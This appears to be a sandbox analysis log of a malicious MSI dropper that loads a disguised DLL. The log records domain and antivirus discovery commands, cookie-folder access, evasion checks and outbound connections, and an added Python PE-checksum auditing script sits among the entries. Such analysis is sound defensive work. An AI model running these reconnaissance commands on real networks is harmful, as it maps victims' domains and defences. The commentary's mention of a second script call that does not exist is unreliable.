Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 5_2_00000001800033E0
Source: Update_cd47bedf.dll.5.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
Source: 360total.dll.1.dr Static PE information: real checksum: 0xd8785 should be: 0xe745c
Source: 360total.dll.1.dr Static PE information: section name: wsgi2
Source: Update_cd47bedf.dll.5.dr Static PE information: section name: wsgi2
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A323C push ecx; ret 3_2_005A324F
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180010451 push rcx; ret 5_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018001045A push rcx; ret 5_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001801758FC push rsp; ret 5_2_00000001801758FD
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180175CDE push 2027C70Fh; ret 5_2_0000000180175CE5
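
The two static PE findings above deserve a closer look than the report gives them. For both 360total.dll and Update_cd47bedf.dll the first value ("real checksum") is what the optional header's CheckSum field holds and the second ("should be") is the value recomputed over the file; a stored value that is non-zero but wrong means the bytes changed after the linker wrote the field, which is what packers and post-build patching leave behind (a zero field is merely unset and is not a red flag). Both files also carry a section named wsgi2, which no Microsoft toolchain emits. That the two drops share identical checksum values and the same odd section name is consistent with Update_cd47bedf.dll being a copy of 360total.dll written by rundll32.exe. The script below is an added example, not code from the report or the sample: it recomputes the image checksum with the standard algorithm, reads the section table, and flags the two conditions. Because the real DLLs are not on this page it builds a minimal PE32+ image in memory as constructed input; the section list and the stored value 0xD8785 are taken from the report, the file contents are not.

```python
import struct

# Section names produced by the usual Microsoft toolchain; anything else deserves a look.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata", ".rsrc",
                   ".reloc", ".tls", ".bss", ".CRT", ".didat", ".gfids", ".00cfg"}

def _layout(data: bytes):
    """Return (number_of_sections, optional_header_offset, section_table_offset)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    return nsections, opt, opt + opt_size

def stored_checksum(data: bytes) -> int:
    """CheckSum field of the optional header (offset 0x40 for both PE32 and PE32+)."""
    _, opt, _ = _layout(data)
    return struct.unpack_from("<I", data, opt + 0x40)[0]

def compute_checksum(data: bytes) -> int:
    """Recompute the PE image checksum the way CheckSumMappedFile does."""
    _, opt, _ = _layout(data)
    field = opt + 0x40
    if field % 4:
        raise ValueError("CheckSum field is not dword-aligned")
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == field:
            continue                      # the field itself is excluded from the sum
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def section_names(data: bytes):
    """Names from the section table (8 bytes each, NUL padded)."""
    nsections, _, table = _layout(data)
    names = []
    for i in range(nsections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        names.append(raw.split(b"\0", 1)[0].decode("ascii", "replace"))
    return names

def audit_pe(data: bytes) -> dict:
    stored, real = stored_checksum(data), compute_checksum(data)
    return {
        "stored_checksum": stored,
        "computed_checksum": real,
        # A zero field just means the linker never set it; a wrong non-zero value
        # means the bytes changed after the checksum was written.
        "checksum_mismatch": stored != 0 and stored != real,
        "unusual_sections": [n for n in section_names(data) if n not in COMMON_SECTIONS],
    }

def build_pe(sections, checksum_field: int) -> bytes:
    """Build a minimal PE32+ image in memory (constructed test input, not the real DLL)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=AMD64, NumberOfSections, TimeDateStamp, SymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)              # PE32+ magic
    struct.pack_into("<I", opt, 0x40, checksum_field)  # CheckSum field under test
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(sections))
    headers = (bytes(dos) + b"PE\0\0" + coff + opt + table).ljust(0x400, b"\0")
    body = bytes((i * 7 + 13) & 0xFF for i in range(0x200 * len(sections)))
    return headers + body

if __name__ == "__main__":
    sample = build_pe([".text", "wsgi2", ".rsrc"], 0xD8785)
    print(audit_pe(sample))
```

Run against a real file, `audit_pe(open(path, "rb").read())` gives the same two answers the sandbox printed. Note that `compute_checksum` skips only the CheckSum dword, so rewriting that field to the computed value (as the second `build_pe` call in the test does) is exactly what the linker's `/RELEASE` switch produces, and the audit then reports no mismatch.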

Persistence and Installation Behavior

Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI181.tmp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe File created: :wtfbbq (copy)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA3.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI54.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4.tmp
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\sharepoint\360total.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFFD6.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI181.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA3.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI54.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFFD6.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI181.tmp

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 5_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 5_2_0000000180062148
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSI181.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 5_2_00000001800655A8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC 5_2_0000000180049AEC
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103176DC rdtsc 6_3_00000180103176DC
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 5_2_00000235B5CE68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo, 5_2_00000235B5CF0EF8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 5_2_00000235B5CE7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 7_2_000001EF532B68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 7_2_000001EF532B7FA8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo, 7_2_000001EF532C0EF8
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 737
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 663
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8599
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: :wtfbbq (copy)
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIA3.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI54.tmp
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIC4.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIFFD6.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dll
Source: C:\Windows\Installer\MSI181.tmp Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Installer\MSI181.tmp API coverage: 7.4 %
Source: C:\Windows\System32\rundll32.exe API coverage: 1.6 %
Source: C:\Windows\System32\rundll32.exe API coverage: 8.2 %
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC 5_2_0000000180049AEC
Source: C:\Windows\System32\wscript.exe TID: 7536 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 7628 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep count: 737 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep time: -737000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7800 Thread sleep count: 663 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7800 Thread sleep time: -66300s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep count: 8599 > 30
Source: C:\Windows\System32\rundll32.exe TID: 7788 Thread sleep time: -8599000s >= -30000s
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_005BB02D
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 5_2_00000235B5CEA350
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 5_2_00000235B5CE1A08
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316604 FindFirstFileA,FindNextFileA, 6_3_0000018010316604
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103116F4 FindFirstFileW,FindNextFileW, 6_3_00000180103116F4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 7_2_000001EF532BA350
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 7_2_000001EF532B1A08
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031AC90 GetSystemInfo, 6_3_000001801031AC90
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640113288.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646222764.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1647249361.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646955380.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1646701265.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1647698950.0000023BEC4DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DFBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW*
Source: rundll32.exe, 00000006.00000003.2933135638.0000018010220000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103176DC rdtsc 6_3_00000180103176DC
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_0058D0A5 IsDebuggerPresent,OutputDebugStringW, 3_2_0058D0A5
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 5_2_0000000180066C3C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 5_2_00000001800033E0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BAD78 mov eax, dword ptr fs:[00000030h] 3_2_005BAD78
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B2DCC mov ecx, dword ptr fs:[00000030h] 3_2_005B2DCC
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00582310 GetProcessHeap, 3_2_00582310
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_005A33A8
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A353F SetUnhandledExceptionFilter, 3_2_005A353F
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_005A2968
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_005A6E1B
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.197.34 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005852F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess, 3_2_005852F0
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
